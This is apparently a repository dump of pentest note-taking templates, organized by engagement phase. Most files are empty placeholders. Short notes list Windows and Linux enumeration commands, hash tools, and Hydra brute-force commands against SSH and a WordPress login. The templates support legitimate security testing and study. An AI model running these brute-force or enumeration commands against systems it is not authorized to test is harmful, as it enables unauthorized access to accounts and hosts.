├── TJ-Pentest-Template-1.0.jex ├── TJ-Pentest-Template-2.0.jex ├── TJ-Pentest-Template-3.0.jex ├── Markdown_Versions ├── Pentest_Template_Master_1.0 │ ├── Pentest Template Master 1.0 │ │ ├── 3. Exploitation │ │ │ ├── Target _1 │ │ │ │ └── Notes.md │ │ │ ├── Bypass Windows Amsi.md │ │ │ ├── Netcat Tips.md │ │ │ ├── Bypassing AV.md │ │ │ ├── 1. General Notes.md │ │ │ └── Msfvenom.md │ │ ├── 4. Post Exploitation │ │ │ ├── Network │ │ │ │ └── Target _1.md │ │ │ ├── Running Processes │ │ │ │ └── Target _1.md │ │ │ ├── Users and Groups │ │ │ │ └── Target _1.md │ │ │ ├── Installed Applications │ │ │ │ └── Target _1.md │ │ │ ├── Scheduled Jobs_Tasks │ │ │ │ ├── Target _1.md │ │ │ │ └── General Notes_.md │ │ │ ├── System Exploitation │ │ │ │ └── Target _1.md │ │ │ ├── File System Information │ │ │ │ └── Target _1.md │ │ │ ├── BloodHound.md │ │ │ ├── Impacket.md │ │ │ ├── 2. C2 Frameworks.md │ │ │ ├── Rubeus.md │ │ │ ├── Mimikatz.md │ │ │ └── 1. General Notes.md │ │ ├── 2. Enumeration │ │ │ ├── Services │ │ │ │ ├── 1. Web │ │ │ │ │ ├── Target _1.md │ │ │ │ │ ├── SQL Injection.md │ │ │ │ │ └── General Notes.md │ │ │ │ ├── 2. SMB │ │ │ │ │ ├── Target _1.md │ │ │ │ │ └── General Notes.md │ │ │ │ ├── 4. SNMP │ │ │ │ │ ├── Target _1.md │ │ │ │ │ └── General Notes.md │ │ │ │ ├── 6. UDP │ │ │ │ │ └── Target _1.md │ │ │ │ ├── 7. Other │ │ │ │ │ └── Target _1.md │ │ │ │ ├── 3. Active Directory (AD) │ │ │ │ │ ├── Target _1.md │ │ │ │ │ └── General Notes.md │ │ │ │ └── 5. TCP │ │ │ │ │ └── Target _1.md │ │ │ ├── General Notes.md │ │ │ ├── Impacket General Notes.md │ │ │ ├── Responder.md │ │ │ └── Impacket Kerberoasting.md │ │ ├── 1. Recon │ │ │ ├── Target _1.md │ │ │ └── General Notes.md │ │ ├── 5. High Value Information │ │ │ ├── Proof_Screenshots │ │ │ │ └── Target _1.md │ │ │ ├── Hashes │ │ │ │ ├── 1. Identifying Hash Types.md │ │ │ │ ├── 2. Cracking Hashes Online │ │ │ │ │ ├── Hydra.md │ │ │ │ │ └── Medusa.md │ │ │ │ ├── 1. Cracking Hashes Offline │ │ │ │ │ ├── Wordlists.md │ │ │ │ │ ├── John The Ripper.md │ │ │ │ │ ├── Cracking WEP_WPA_WPA 2 PSK Authetication.md │ │ │ │ │ └── Hashcat.md │ │ │ │ └── 2. Dumping Hashes.md │ │ │ └── Passwords │ │ │ │ └── General Notes.md │ │ ├── General Information.md │ │ ├── 6. Reporting │ │ │ └── Tips for Writing a Report.md │ │ └── Pivoting_Tunneling.md │ └── _resources │ │ ├── 310x310.png │ │ └── d2550626a1c94aeebd273d43be0669c9.png ├── Pentest_Template_Master_2.0 │ ├── Pentest Template Master 2.0 │ │ ├── 3. Exploitation │ │ │ ├── Target _1 │ │ │ │ └── Notes.md │ │ │ ├── Bypass Windows Amsi.md │ │ │ ├── Netcat Tips.md │ │ │ ├── Searchsploit.md │ │ │ ├── Bypassing AV.md │ │ │ └── Msfvenom.md │ │ ├── 2. Enumeration │ │ │ ├── Services │ │ │ │ ├── 1. Web │ │ │ │ │ ├── Changelog.txt │ │ │ │ │ │ └── Changelog.txt Notes.md │ │ │ │ │ ├── Target _1.md │ │ │ │ │ └── SQL Injection.md │ │ │ │ ├── 2. SMB │ │ │ │ │ ├── Target _1.md │ │ │ │ │ └── General Notes.md │ │ │ │ ├── 4. SNMP │ │ │ │ │ ├── Target _1.md │ │ │ │ │ └── General Notes.md │ │ │ │ ├── 7. UDP │ │ │ │ │ └── Target _1.md │ │ │ │ ├── 8. Other │ │ │ │ │ └── Target _1.md │ │ │ │ ├── 3. Active Directory (AD) │ │ │ │ │ ├── Target _1.md │ │ │ │ │ └── General Notes.md │ │ │ │ ├── 6. TCP │ │ │ │ │ └── Target _1.md │ │ │ │ └── 5. FTP │ │ │ │ │ └── General Notes.md │ │ │ ├── Impacket General Notes.md │ │ │ ├── General Notes.md │ │ │ ├── Responder.md │ │ │ └── Impacket Kerberoasting.md │ │ ├── 4. Post Exploitation │ │ │ ├── Target _1 (Default Template) │ │ │ │ ├── System Information │ │ │ │ │ ├── Target _1.md │ │ │ │ │ ├── General Notes Windows.md │ │ │ │ │ └── General Notes Linux.md │ │ │ │ ├── Network │ │ │ │ │ ├── Target _1.md │ │ │ │ │ ├── General Notes Linux.md │ │ │ │ │ └── General Notes Windows.md │ │ │ │ ├── Running Processes │ │ │ │ │ ├── Target _1.md │ │ │ │ │ ├── General Notes Windows.md │ │ │ │ │ └── General Notes Linux.md │ │ │ │ ├── Users and Groups │ │ │ │ │ ├── Target _1.md │ │ │ │ │ ├── General Notes Linux_.md │ │ │ │ │ └── General Notes Windows.md │ │ │ │ ├── Files on the System │ │ │ │ │ ├── Target _1.md │ │ │ │ │ ├── General Notes Windows.md │ │ │ │ │ └── General Notes Linux.md │ │ │ │ ├── Installed Applications │ │ │ │ │ ├── Target _1.md │ │ │ │ │ ├── General Notes Linux.md │ │ │ │ │ └── General Notes Windows.md │ │ │ │ ├── Scheduled Jobs_Tasks │ │ │ │ │ ├── Target _1.md │ │ │ │ │ ├── General Notes Linux.md │ │ │ │ │ └── General Notes Windows.md │ │ │ │ ├── System Exploitation │ │ │ │ │ └── Target _1.md │ │ │ │ └── 1. Output from Privesc Scripts │ │ │ │ │ └── Output from [Linux_Windows Priv Esc Script].md │ │ │ ├── BloodHound.md │ │ │ ├── Impacket.md │ │ │ ├── Rubeus.md │ │ │ ├── 2. C2 Frameworks.md │ │ │ ├── Transferring Files.md │ │ │ ├── Mimikatz.md │ │ │ └── 1. General Notes.md │ │ ├── 1. Recon │ │ │ ├── Target _1.md │ │ │ └── General Notes.md │ │ ├── 5. High Value Information │ │ │ ├── Proof_Screenshots │ │ │ │ └── Target _1.md │ │ │ ├── Hashes │ │ │ │ ├── 1. Identifying Hash Types.md │ │ │ │ ├── 2. Cracking Hashes Online │ │ │ │ │ ├── Hydra.md │ │ │ │ │ └── Medusa.md │ │ │ │ ├── 1. Cracking Hashes Offline │ │ │ │ │ ├── Wordlists.md │ │ │ │ │ ├── John The Ripper.md │ │ │ │ │ ├── Cracking WEP_WPA_WPA 2 PSK Authetication.md │ │ │ │ │ └── Hashcat.md │ │ │ │ └── 2. Dumping Hashes.md │ │ │ └── Passwords │ │ │ │ └── General Notes.md │ │ ├── 6. Reporting │ │ │ └── Tips for Writing a Report.md │ │ ├── General Information.md │ │ └── Pivoting_Tunneling.md │ └── _resources │ │ ├── 310x310.png │ │ └── d2550626a1c94aeebd273d43be0669c9.png └── Pentest_Template_Master_3.0 │ ├── _resources │ ├── 310x310.png │ └── d2550626a1c94aeebd273d43be0669c9.png │ └── Pentest Template Master 3.0 │ ├── 2. Recon Targets │ └── Target _1.md │ ├── 9. High Value Information_Reporting │ ├── Proof_Screenshots │ │ └── Target _1.md │ ├── Hashes │ │ ├── 1. Identifying Hash Types.md │ │ ├── 2. Cracking Hashes Online │ │ │ ├── Hydra.md │ │ │ └── Medusa.md │ │ ├── 1. Cracking Hashes Offline │ │ │ ├── Wordlists.md │ │ │ ├── John The Ripper.md │ │ │ ├── Cracking WEP_WPA_WPA 2 PSK Authetication.md │ │ │ └── Hashcat.md │ │ └── 2. Dumping Hashes.md │ ├── Passwords │ │ └── General Notes.md │ └── Reporting │ │ └── Tips for Writing a Report.md │ ├── 4. Enumerating Targets │ └── Target _1.md │ ├── 6. Exploitation Targets_ │ └── Target _1.md │ ├── 8. Post Exploitation Targets │ └── Target _1.md │ ├── 7. Post Exploitation │ ├── Scheduled Jobs_Tasks │ │ ├── General Notes Linux.md │ │ └── General Notes Windows.md │ ├── Running Processes │ │ ├── General Notes Windows.md │ │ └── General Notes Linux.md │ ├── System Information │ │ ├── General Notes Windows.md │ │ └── General Notes Linux.md │ ├── Users and Groups │ │ ├── General Notes Windows.md │ │ └── General Notes Linux_.md │ ├── Kerberos Ticket Creation.md │ ├── Installed Applications │ │ ├── General Notes Linux.md │ │ └── General Notes Windows.md │ ├── Network │ │ ├── General Notes Linux.md │ │ └── General Notes Windows.md │ ├── Rubeus.md │ ├── Editable Services │ │ └── General Notes.md │ ├── Mimikatz.md │ ├── BloodHound.md │ ├── General Notes.md │ └── Files on the System │ │ ├── General Notes Windows.md │ │ └── General Notes Linux.md │ ├── 3. Enumeration Notes │ ├── Impacket General Notes.md │ ├── General Notes.md │ ├── Services │ │ ├── 04. Web (HTTP_HTTPS) │ │ │ ├── SQL Injection.md │ │ │ ├── Directory Fuzzing.md │ │ │ └── Enumerating Web Services.md │ │ ├── 3. Active Directory (AD) │ │ │ └── General Notes.md │ │ ├── 02. SSH │ │ │ └── Enumerating SSH.md │ │ ├── 01. FTP │ │ │ └── Enumerating FTP.md │ │ ├── 4. SNMP │ │ │ └── General Notes.md │ │ ├── 03. Email Services │ │ │ └── Enumerating Email Services.md │ │ ├── 05. Network Shares (SMB, SAMBA, NFS) │ │ │ └── SMB Enumeration.md │ │ └── 8. Other Services │ │ │ └── LDAP Enumeration (Port 389).md │ ├── Impacket Kerberoasting.md │ ├── Impacket NtlmRelayX.md │ ├── Pretender.md │ └── Responder.md │ ├── 1. Recon Notes │ ├── General Notes.md │ ├── Discovery Scans │ │ ├── Domain_Sub Domain Discovery.md │ │ ├── DNS_Hostname Discovery.md │ │ └── Network Discovery Scans.md │ ├── Host Scans │ │ ├── Other Scanners.md │ │ ├── Masscan.md │ │ └── Nmap.md │ └── Pivoting_Tunneling.md │ ├── 5. Exploitation Notes │ ├── Bypass Windows Amsi.md │ ├── Netcat Tips.md │ ├── Villian Cheatsheet.md │ ├── Searchsploit.md │ ├── Transferring Files.md │ ├── Bypassing AV.md │ └── Msfvenom.md │ └── General Information.md └── README.md /TJ-Pentest-Template-1.0.jex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/TJ-Pentest-Template-1.0.jex -------------------------------------------------------------------------------- /TJ-Pentest-Template-2.0.jex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/TJ-Pentest-Template-2.0.jex -------------------------------------------------------------------------------- /TJ-Pentest-Template-3.0.jex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/TJ-Pentest-Template-3.0.jex -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Target _1/Notes.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Target _1/Notes.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Changelog.txt/Changelog.txt Notes.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/Target _1.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Network/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/6. UDP/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/7. Other/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/7. UDP/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/8. Other/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Running Processes/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Users and Groups/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/_resources/310x310.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_1.0/_resources/310x310.png -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/_resources/310x310.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_2.0/_resources/310x310.png -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/_resources/310x310.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_3.0/_resources/310x310.png -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Installed Applications/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/System Exploitation/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/File System Information/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Proof_Screenshots/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your targets here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Proof_Screenshots/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your targets here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/2. Recon Targets/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Proof_Screenshots/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your targets here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/5. TCP/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/6. TCP/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/4. Enumerating Targets/Target _1.md: -------------------------------------------------------------------------------- 1 | # This is a placeholder to contain all notes regarding the enumeration phase for each target you assess. -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/6. Exploitation Targets_/Target _1.md: -------------------------------------------------------------------------------- 1 | # This is a placeholder to contain all notes regarding the exploitation phase for each target you assess. -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Exploitation/Target _1.md: -------------------------------------------------------------------------------- 1 | # Fill in results or other information about your target here: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/8. Post Exploitation Targets/Target _1.md: -------------------------------------------------------------------------------- 1 | # This is a placeholder to contain all notes regarding the post-exploitation phase for each target you assess. -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/_resources/d2550626a1c94aeebd273d43be0669c9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_1.0/_resources/d2550626a1c94aeebd273d43be0669c9.png -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/_resources/d2550626a1c94aeebd273d43be0669c9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_2.0/_resources/d2550626a1c94aeebd273d43be0669c9.png -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/_resources/d2550626a1c94aeebd273d43be0669c9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_3.0/_resources/d2550626a1c94aeebd273d43be0669c9.png -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Identifying Hash Types.md: -------------------------------------------------------------------------------- 1 | In Kali: 2 | 3 | - Hash-identifier 4 | 5 | Online: 6 | 7 | - Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Identifying Hash Types.md: -------------------------------------------------------------------------------- 1 | In Kali: 2 | 3 | - Hash-identifier 4 | 5 | Online: 6 | 7 | - Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Passwords/General Notes.md: -------------------------------------------------------------------------------- 1 | # Any passwords or hashs that you fine should be documented here. Include steps on how you were able to obtain them from your target: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Passwords/General Notes.md: -------------------------------------------------------------------------------- 1 | # Any passwords or hashs that you fine should be documented here. Include steps on how you were able to obtain them from your target: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md: -------------------------------------------------------------------------------- 1 | # When in Doubt...Always Enumerate! Enumeration is the key! 2 | 3 | 4 | 5 | ## Resources 6 | - http://www.0daysecurity.com/penetration-testing/enumeration.html -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Identifying Hash Types.md: -------------------------------------------------------------------------------- 1 | In Kali: 2 | 3 | - Hash-identifier 4 | 5 | Online: 6 | 7 | - Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Passwords/General Notes.md: -------------------------------------------------------------------------------- 1 | # Any passwords or hashs that you find should be documented here. Include steps on how you were able to obtain them from your target: -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | # Linux: 2 | 3 | - cat /etc/crontab 4 | - cat /etc/anacrontab 5 | - cat /etc/frontal 6 | - cat /etc/anacron 7 | - systemctl list-timers --all -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | # Linux: 2 | 3 | - cat /etc/crontab 4 | - cat /etc/anacrontab 5 | - cat /etc/frontal 6 | - cat /etc/anacron 7 | - systemctl list-timers --all -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket General Notes.md: -------------------------------------------------------------------------------- 1 | ## In Kali 2 | 3 | apt install impacket-scripts 4 | 5 | ## Github 6 | 7 | https://github.com/fortra/impacket 8 | 9 | ## Local Locations: 10 | 11 | /usr/share/doc/python3-impacket/examples 12 | 13 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md: -------------------------------------------------------------------------------- 1 | ## In Kali 2 | 3 | apt install impacket-scripts 4 | 5 | ## Github 6 | 7 | https://github.com/SecureAuthCorp/impacket 8 | 9 | ## Local Locations: 10 | 11 | /usr/share/doc/python3-impacket/examples 12 | 13 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket General Notes.md: -------------------------------------------------------------------------------- 1 | ## In Kali 2 | 3 | apt install impacket-scripts 4 | 5 | ## Github 6 | 7 | https://github.com/SecureAuthCorp/impacket 8 | 9 | ## Local Locations: 10 | 11 | /usr/share/doc/python3-impacket/examples 12 | 13 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/1. Output from Privesc Scripts/Output from [Linux_Windows Priv Esc Script].md: -------------------------------------------------------------------------------- 1 | # This is a note placeholder to put your output that you recieved from a priv esc script that you executed on the target you obtained access too. -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/General Information.md: -------------------------------------------------------------------------------- 1 | Created by TJ Null: 2 | 3 | Twitter: https://twitter.com/TJ_Null 4 | Github: https://github.com/tjnull 5 | 6 | Contribution: 7 | 8 | If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here: 9 | - https://github.com/tjnull/TJ-JPT -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/General Notes.md: -------------------------------------------------------------------------------- 1 | # When in Doubt...Always Enumerate! Enumeration is the key! 2 | 3 | 4 | 5 | ## Resources 6 | - http://www.0daysecurity.com/penetration-testing/enumeration.html 7 | - Backup Link: https://web.archive.org/web/20201122081447/http://www.0daysecurity.com/penetration-testing/enumeration.html -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Check for Processes 2 | 3 | - tasklist 4 | - wmic process list full 5 | 6 | # In PowerShell 7 | - Get-Process 8 | - Get-Process -Name 'Notepad' 9 | 10 | List path where the process is running: 11 | - (Get-Process -Name 'Calculator').Path 12 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Check for Processes 2 | 3 | - tasklist 4 | - wmic process list full 5 | 6 | # In PowerShell 7 | - Get-Process 8 | - Get-Process -Name 'Notepad' 9 | 10 | List path where the process is running: 11 | - (Get-Process -Name 'Calculator').Path 12 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Command Line: 2 | 3 | - systeminfo 4 | 5 | # PowerShell 6 | 7 | - Get-ComputerInfo 8 | - Get-ComputerInfo -Property "*version" 9 | - Get-ComputerInfo -Property "*version", "os*" | select WindowsCurrentVersion, WindowsVersion, OsName, OsBuildNumber, OsHotFixes, OsArchitecture | fl -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Hydra.md: -------------------------------------------------------------------------------- 1 | - hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22 2 | 3 | - hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22 4 | 5 | - hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Hydra.md: -------------------------------------------------------------------------------- 1 | - hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22 2 | 3 | - hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22 4 | 5 | - hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/General Notes_.md: -------------------------------------------------------------------------------- 1 | # Windows: 2 | 3 | - schtasks 